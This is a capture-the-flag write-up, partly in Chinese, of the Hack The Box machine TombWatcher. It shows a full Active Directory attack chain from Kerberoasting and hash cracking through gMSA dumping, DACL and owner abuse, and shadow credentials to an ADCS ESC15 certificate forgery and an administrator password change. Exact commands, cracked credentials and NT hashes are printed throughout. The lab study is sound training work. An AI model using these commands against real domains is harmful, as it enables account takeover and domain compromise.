TombWatcher
As is common in real life Windows pentests, you will start the TombWatcher box with credentials for the following account: henry / H3nry_987TGV!
Recon
Ports
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-10 05:44:46Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-10T05:46:20+00:00; +3h59m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after: 2025-11-16T00:47:59
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after: 2025-11-16T00:47:59
|_ssl-date: 2025-06-10T05:46:20+00:00; +4h00m00s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after: 2025-11-16T00:47:59
|_ssl-date: 2025-06-10T05:46:20+00:00; +3h59m59s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after: 2025-11-16T00:47:59
|_ssl-date: 2025-06-10T05:46:21+00:00; +3h59m59s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
49678/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49679/tcp open msrpc Microsoft Windows RPC
49698/tcp open msrpc Microsoft Windows RPC
49744/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 3h59m59s, deviation: 0s, median: 3h59m58s
| smb2-time:
| date: 2025-06-10T05:45:40
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.43 seconds
sudo nmap -sU -F tombWatcher.htb
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-10 09:49 CST
Nmap scan report for tombWatcher.htb (10.129.253.81)
Host is up (0.32s latency).
rDNS record for 10.129.253.81: dc01.tombWatcher.htb
Not shown: 97 open|filtered udp ports (no-response)
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
445端口
使用已知凭据进入smb,无有效信息。
80端口
80端口为IIS的index目录,目录扫描无有效信息。
域内分析
进行bloodhound进行域内信息搜集,具有利用链如下:
Exploit
User
依照上述利用链,依次执行利用。
writeSPN abuse
faketime "$(ntpdate -q dc01.tombwatcher.htb | cut -d ' ' -f 1,2)" ./targetedKerberoast.py -D tombwatcher.htb --request-user ALFRED -d tombwatcher.htb -u henry -p 'H3nry_987TGV!'
[*] Starting kerberoast attacks
[*] Attacking user (ALFRED)
[+] Printing hash for (Alfred)
$krb5tgs$23$*Alfred$TOMBWATCHER.HTB$tombwatcher.htb/Alfred*$d7a296f725ba880d3a92b55cb4d2ebd1$6999efd2f20440adc603181df9528902020d4ed38992f890a9508253d8a2149872fc91ed67d14ac0ede19e034b834bb1721dd029a275f021084d60b4826baa8777bfe498950b83112e08d756d5adc968a007ca4a971ae04eef28f6e137c8bbda8cd9453f64322eb9e7efcf88d6287fc0d3b1b22d2f9098a2d76a801935058e266c31eb3b0fe9f9486aeb80ad2a29b262de04f3d7f69e0e6d0a67741e9762d1414c000b021e8e65ca10aeb95417ada17a30ac10cce771a59c559fe6143f99db0b7769a13d6591d908512060a1a2e75b6fc1546b9d1ceff12d2df10db6f20c533d90e4ee79e24a6596282aae3d49a32f6d300cda85f2cb1fa0c5fe84e274db094e265642f8d298eb72abd7bbdfbd680dd577324bf77d046d4e36641e11c7a013fb73e17e186300d8805e82700728db1eaf5b38167d0e87a8e354b4ea6d36bc213dcea280d3c5c4ba78cee7a781aff3063970a191d7eb08c0b022240104b5703a121081217407b54c953ab621bb9978d51cd8592be214215b529f1ebe542d0f7ecdaf981f4c1fefcc5df303391e2a805338226362482d80cd874480a25277b34b1f0761c1e2e868159c09600d63186418dadc6837293fd2371194f9fe0283b08fa29b04ef87ca2ef0e4dab39368672f38b9f767cd6ea547db41b11a91adbc4f61ac39e4756fedbc919dd05211cab9b09573e266f529d68b89d348a54a09344dbb0e815f4613318c32c3e7eab129471ca14e221e849e3c7d0c7b492804f2934959c784aa7291c14093dff0356abb8fceb094bf74dfe1e8ec97220e5575638efb7ab65e939971e6a208b2457a3b8b5a3c0fa8ce530ac7a2d0928abfd90f7ccbdf6e59897cbeee7dae9d9bbacf39242e2cf2e0caf3c293161fd546c201fb3c05424457ee1109c7d81e16deff92f04b507a57ac0df7dc50386c03b0941a89683366df144057eb8b6d81237b4bbe72421184d4c79a902ffc34096906d218f526d0bbeca726194a39808da36b42adf1118bc99ea37a06470f457534c14ad715e0f021e1af90e01ee9db4413716fe1fbc252d997b925b4b5c333a04c0e530ad49d15f7ae18544f1c6d2e0bc0a4a5d8fcbb767696f460deed8f3af0a5dffd27a1286c60a8242646c1c9e34b78965077082ca11c67cb6c3a85b9d7470ff746f81b96f1e18904fe0c42be04688ecf275a8434cf295595828cb45c8327e71b8a9d7215726f096fb66ef7906e208905d984fabcbe38314af478ed5ed608e727a275cb6ba17d3cffd0c7fe36ba321864124a4315f783e7658c0da064ea6f650aaa08dbd4c656c5d534e63f180f26f68e5ecaa32146141feab7bda0354db79cd5302c8b18c8b61f16ab6642b5529696a46d4797f2e10e092b95767bb0d00d65960ab40609c4b61606ba6e38785092648f8c3367187a4006cfbb68603a4e985cc6949576922ed3fe9b3ed49689f47eb670305ce665a845cfb39df0e249e9
hashcat爆破用户Alfred密码。
hashcat -a 0 -m 13100 ./alfred_hashes /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting [0/85]
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #1: cpu-skylake-avx512-AMD Ryzen 7 PRO 7840U w/ Radeon 780M Graphics, 2201/4466 MB (1024 MB allocatable), 12MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 3 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$krb5tgs$23$*Alfred$TOMBWATCHER.HTB$tombwatcher.htb/Alfred*$d7a296f725ba880d3a92b55cb4d2ebd1$6999efd2f20440adc603181df9528902020d4ed38992f890a9508253d8a2149872fc91ed67d14ac0ede19e034b834bb1721dd029a275f021084d60b4826baa8777bfe498950b83112e08d756d5adc968a007ca4a971ae04eef28f6e137c8bbda8cd9453f64322eb9e7efcf88d6287fc0d3b1b22d2f9098a2d76a801935058e266c31eb3b0fe9f9486aeb80ad2a29b262de04f3d7f69e0e6d0a67741e9762d1414c000b021e8e65ca10aeb95417ada17a30ac10cce771a59c559fe6143f99db0b7769a13d6591d908512060a1a2e75b6fc1546b9d1ceff12d2df10db6f20c533d90e4ee79e24a6596282aae3d49a32f6d300cda85f2cb1fa0c5fe84e274db094e265642f8d298eb72abd7bbdfbd680dd577324bf77d046d4e36641e11c7a013fb73e17e186300d8805e82700728db1eaf5b38167d0e87a8e354b4ea6d36bc213dcea280d3c5c4ba78cee7a781aff3063970a191d7eb08c0b022240104b5703a121081217407b54c953ab621bb9978
d51cd8592be214215b529f1ebe542d0f7ecdaf981f4c1fefcc5df303391e2a805338226362482d80cd874480a25277b34b1f0761c1e2e868159c09600d63186418dadc6837293fd2371194f9fe0283b08fa29b04ef87ca2ef0e4dab39368672f38b9f767cd6ea547db41b11a91adbc4f61ac39e4756fedbc919dd05211cab9b09573e266f529d68b89d348a54a09344dbb0e815f4613318c32c3e7eab129471ca14e221e849e3c7d0c7b492804f2934959c784aa7291c14093dff0356abb8fceb094bf74dfe1e8ec97220e5575638efb7ab65e939971e6a208b2457a3b8b5a3c0fa8ce530ac7a2d0928abfd90f7ccbdf6e59897cbeee7dae9d9bbacf39242e2cf2e0caf3c293161fd546c201fb3c05424457ee1109c7d81e16deff92f04b507a57ac0df7dc50386c03b0941a89683366df144057eb8b6d81237b4bbe72421184d4c79a902ffc34096906d218f526d0bbeca726194a39808da36b42adf1118bc99ea37a06470f457534c14ad715e0f021e1af90e01ee9db4413716fe1fbc252d997b925b4b5c333a04c0e530ad49d15f7ae18544f1c6d2e0bc0a4a5d8f
cbb767696f460deed8f3af0a5dffd27a1286c60a8242646c1c9e34b78965077082ca11c67cb6c3a85b9d7470ff746f81b96f1e18904fe0c42be04688ecf275a8434cf295595828cb45c8327e71b8a9d7215726f096fb66ef7906e208905d984fabcbe38314af478ed5ed608e727a275cb6ba17d3cffd0c7fe36ba321864124a4315f783e7658c0da064
ea6f650aaa08dbd4c656c5d534e63f180f26f68e5ecaa32146141feab7bda0354db79cd5302c8b18c8b61f16ab6642b5529696a46d4797f2e10e092b95767bb0d00d65960ab40609c4b61606ba6e38785092648f8c3367187a4006cfbb68603a4e985cc6949576922ed3fe9b3ed49689f47eb670305ce665a845cfb39df0e249e9:basketball
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*Alfred$TOMBWATCHER.HTB$tombwatcher.htb...e249e9
Time.Started.....: Tue Jun 10 10:39:31 2025 (0 secs)
Time.Estimated...: Tue Jun 10 10:39:31 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 682.1 kH/s (1.04ms) @ Accel:512 Loops:1 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 6144/14344385 (0.04%)
Rejected.........: 0/6144 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> iheartyou
Hardware.Mon.#1..: Util: 9%
Started: Tue Jun 10 10:39:14 2025
Stopped: Tue Jun 10 10:39:32 2025
Adself abuse
bloodyAD -d tombwathcer.htb --host 10.129.253.81 -u ALFRED -p 'basketball' add groupMember 'INFRASTRUCTURE' 'ALFRED'
ReadgMSAPassword abuse
得到ansible_dev$机器用户的nthash
./gMSADumper.py -d tombwatcher.htb -u ALFRED -p 'basketball'
Users or groups who can read password for ansible_dev$:
> Infrastructure
ansible_dev$:::1c37d00093dc2a5f25176bf2d474afdc
ansible_dev$:aes256-cts-hmac-sha1-96:526688ad2b7ead7566b70184c518ef665cc4c0215a1d634ef5f5bcda6543b5b3
ansible_dev$:aes128-cts-hmac-sha1-96:91366223f82cd8d39b0e767f0061fd9a
ForceChangePssword abuse
bloodyAD -d tombwathcer.htb --host 10.129.253.81 -u 'ANSIBLE_DEV$' -p ':1c37d00093dc2a5f25176bf2d474afdc' set password SAM 'sam@123'
[+] Password changed successfully!
WriteOwner abuse
- 写用户john的owner
impacket-owneredit tombwatcher.htb/sam:'sam@123' -dc-ip 10.129.253.81 -action write -target john -new-owner sam
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Current owner information below
[*] - SID: S-1-5-21-1392491010-1358638721-2126982587-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=tombwatcher,DC=htb
[*] OwnerSid modified successfully!
- 改写DACL,让新Owner sam具有FullControl权限。
impacket-dacledit tombwatcher.htb/sam:'sam@123' -dc-ip 10.129.253.81 -principal sam -target john -action write -rights FullControl
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] DACL backed up to dacledit-20250610-113121.bak
[*] DACL modified successfully!
- 添加ShadowCredential
faketime "$(ntpdate -q dc01.tombwatcher.htb | cut -d ' ' -f 1,2)" certipy-ad shadow auto -dc-ip 10.129.198.220 -u sam -p 'sam@123' -account john
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'john'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '0f733c41-066b-6032-92ee-3ee54bd918d3'
[*] Adding Key Credential with device ID '0f733c41-066b-6032-92ee-3ee54bd918d3' to the Key Credentials for 'john'
[*] Successfully added Key Credential with device ID '0f733c41-066b-6032-92ee-3ee54bd918d3' to the Key Credentials for 'john'
[*] Authenticating as 'john' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'john@tombwatcher.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'john.ccache'
[*] Wrote credential cache to 'john.ccache'
[*] Trying to retrieve NT hash for 'john'
[*] Restoring the old Key Credentials for 'john'
[*] Successfully restored the old Key Credentials for 'john'
[*] NT hash for 'john': ad9324754583e3e42b55aad4d3b8d2bf
evil-winrm 登录得到User。
*Evil-WinRM* PS C:\Users\john\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
**SeMachineAccountPrivilege** Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Root
后续发现,john对ADCS OU具有GenericALL权限。
且在进行机器信息搜集时发现存在已删除账户cert_admin。
*Evil-WinRM* PS C:\Users\john\documents> Get-ADObject -Filter {isDeleted -eq $true} -IncludeDeletedObjects
Deleted : True
DistinguishedName : CN=Deleted Objects,DC=tombwatcher,DC=htb
Name : Deleted Objects
ObjectClass : container
ObjectGUID : 34509cb3-2b23-417b-8b98-13f0bd953319
Deleted : True
DistinguishedName : CN=cert_admin\0ADEL:f80369c8-96a2-4a7f-a56c-9c15edd7d1e3,CN=Deleted Objects,DC=tombwatcher,DC=htb
Name : cert_admin
DEL:f80369c8-96a2-4a7f-a56c-9c15edd7d1e3
ObjectClass : user
ObjectGUID : f80369c8-96a2-4a7f-a56c-9c15edd7d1e3
Deleted : True
DistinguishedName : CN=cert_admin\0ADEL:c1f1f0fe-df9c-494c-bf05-0679e181b358,CN=Deleted Objects,DC=tombwatcher,DC=htb
Name : cert_admin
DEL:c1f1f0fe-df9c-494c-bf05-0679e181b358
ObjectClass : user
ObjectGUID : c1f1f0fe-df9c-494c-bf05-0679e181b358
Deleted : True
DistinguishedName : CN=cert_admin\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb
Name : cert_admin
DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf
ObjectClass : user
ObjectGUID : 938182c3-bf0b-410a-9aaa-45c8e1a02ebf
因为有几个同名用户,寻找最近被删除的。
*Evil-WinRM* PS C:\Users\john\documents> Get-ADObject -Filter {isDeleted -eq $true -and Name -like "*cert_admin*"} -IncludeDeletedObjects -Properties whenChanged | Sort-Object whenChanged -Descending
Deleted : True
DistinguishedName : CN=cert_admin\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb
Name : cert_admin
DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf
ObjectClass : user
ObjectGUID : 938182c3-bf0b-410a-9aaa-45c8e1a02ebf
whenChanged : 11/16/2024 12:07:27 PM
Deleted : True
DistinguishedName : CN=cert_admin\0ADEL:c1f1f0fe-df9c-494c-bf05-0679e181b358,CN=Deleted Objects,DC=tombwatcher,DC=htb
Name : cert_admin
DEL:c1f1f0fe-df9c-494c-bf05-0679e181b358
ObjectClass : user
ObjectGUID : c1f1f0fe-df9c-494c-bf05-0679e181b358
whenChanged : 11/16/2024 12:04:21 PM
Deleted : True
DistinguishedName : CN=cert_admin\0ADEL:f80369c8-96a2-4a7f-a56c-9c15edd7d1e3,CN=Deleted Objects,DC=tombwatcher,DC=htb
Name : cert_admin
DEL:f80369c8-96a2-4a7f-a56c-9c15edd7d1e3
ObjectClass : user
ObjectGUID : f80369c8-96a2-4a7f-a56c-9c15edd7d1e3
启用账户。
Restore-ADObject -Identity "938182c3-bf0b-410a-9aaa-45c8e1a02ebf"
查询用户cert_admin相关信息:属于OU-ADCS。
*Evil-WinRM* PS C:\Users\john\Documents> Get-ADUser -Identity "cert_admin"
DistinguishedName : CN=cert_admin,OU=ADCS,DC=tombwatcher,DC=htb
Enabled : True
GivenName : cert_admin
Name : cert_admin
ObjectClass : user
ObjectGUID : 938182c3-bf0b-410a-9aaa-45c8e1a02ebf
SamAccountName : cert_admin
SID : S-1-5-21-1392491010-1358638721-2126982587-1111
Surname : cert_admin
UserPrincipalName :
更改账户密码
bloodyAD -d tombwatcher.htb --host 10.129.253.81 -u john -p ':ad9324754583e3e42b55aad4d3b8d2bf' set password cert_admin 'cert@123'
[+] Password changed successfully!
寻找证书模板漏洞
certipy-ad find -vulnerable -dc-ip 10.129.253.81 -u cert_admin -p 'cert@123'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'tombwatcher-CA-1' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'tombwatcher-CA-1'
[*] Checking web enrollment for CA 'tombwatcher-CA-1' @ 'DC01.tombwatcher.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20250610171722_Certipy.txt'
[*] Wrote text output to '20250610171722_Certipy.txt'
[*] Saving JSON output to '20250610171722_Certipy.json'
[*] Wrote JSON output to '20250610171722_Certipy.json'
发现存在ESC15。
cat 20250610171722_Certipy.txt
Certificate Authorities 0 CA Name : tombwatcher-CA-1
DNS Name : DC01.tombwatcher.htb
Certificate Subject : CN=tombwatcher-CA-1, DC=tombwatcher, DC=htb Certificate Serial Number : 3428A7FC52C310B2460F8440AA8327AC Certificate Validity Start : 2024-11-16 00:47:48+00:00
Certificate Validity End : 2123-11-16 00:57:48+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : TOMBWATCHER.HTB\Administrators
Access Rights
ManageCa : TOMBWATCHER.HTB\Administrators
TOMBWATCHER.HTB\Domain Admins
ManageCertificates : TOMBWATCHER.HTB\Administrators
TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Enroll : TOMBWATCHER.HTB\Authenticated Users
Certificate Templates
0
Template Name : WebServer
Display Name : Web Server
Certificate Authorities : tombwatcher-CA-1
Enabled : True
Client Authentication : False
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Extended Key Usage : Server Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 1
Validity Period : 2 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2024-11-16T00:57:49+00:00
Template Last Modified : 2024-11-16T17:07:26+00:00
Permissions
Enrollment Permissions
Enrollment Rights : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
TOMBWATCHER.HTB\cert_admin
Object Control Permissions
Owner : TOMBWATCHER.HTB\Enterprise Admins
Full Control Principals : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Write Owner Principals : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Write Dacl Principals : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Write Property Enroll : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
TOMBWATCHER.HTB\cert_admin
[+] User Enrollable Principals : TOMBWATCHER.HTB\cert_admin
[!] Vulnerabilities
ESC15 : Enrollee supplies subject and schema version is 1.
[*] Remarks
ESC15 : Only applicable if the environment has not been patched. See CVE-2024-49019 or the wiki for more details.
按照WIKI复现利用。
certipy-ad req -u 'cert_admin@tombwatcher.htb' -p 'cert@123' -ns 10.129.71.180 -dc-ip 10.129.71.180 -target tombwatcher.htb -ca 'tombwatcher-CA-1' -template 'WebServer' -upn 'administrator@tombwatcher.htb' -sid 'S-1-5-21-1392491010-1358638721-2126982587-500' -application-policies 'Client Authentication'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 4
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@tombwatcher.htb'
[*] Certificate object SID is 'S-1-5-21-1392491010-1358638721-2126982587-500'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
更改administrator密码。
certipy-ad auth -pfx administrator.pfx -dc-ip 10.129.71.180 -domain tombwatcher.htb -ldap-shell
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@tombwatcher.htb'
[*] SAN URL SID: 'S-1-5-21-1392491010-1358638721-2126982587-500'
[*] Security Extension SID: 'S-1-5-21-1392491010-1358638721-2126982587-500'
[*] Connecting to 'ldaps://10.129.71.180:636'
[*] Authenticated to '10.129.71.180' as: 'u:TOMBWATCHER\\Administrator'
Type help for list of commands
# change_password administrator admin@123
Got User DN: CN=Administrator,CN=Users,DC=tombwatcher,DC=htb
Attempting to set new password of: admin@123
Password changed successfully!
# exit
Bye!
evil-winrm -i tomwathcer.htb -u administrator -p admin@123
Summary
user路径十分清晰易懂,新手友好。 Root路径难点在于是要寻找到被删除账户cert_admin。感觉最近的ADCS相关机器变多了。
Beyond
为什么具有WriteOwner权限可修改受害账户的DACL? 在 Windows 安全模型中,所有者默认具有以下权限:
- 修改 DACL 的权限:
- 所有者可以更改对象的 DACL(即访问控制列表,决定谁可以访问该对象)。
- 这意味着所有者可以给自己添加 Full Control 权限,甚至删除其他用户的访问权限。
- Windows 安全策略:
- 在默认情况下,所有者(Owner) 自动拥有 WRITE_DAC(修改 DACL)权限,即使 DACL 中没有显式列出该权限。
- 这是 Windows 安全模型的核心机制,确保所有者始终能控制自己的资源。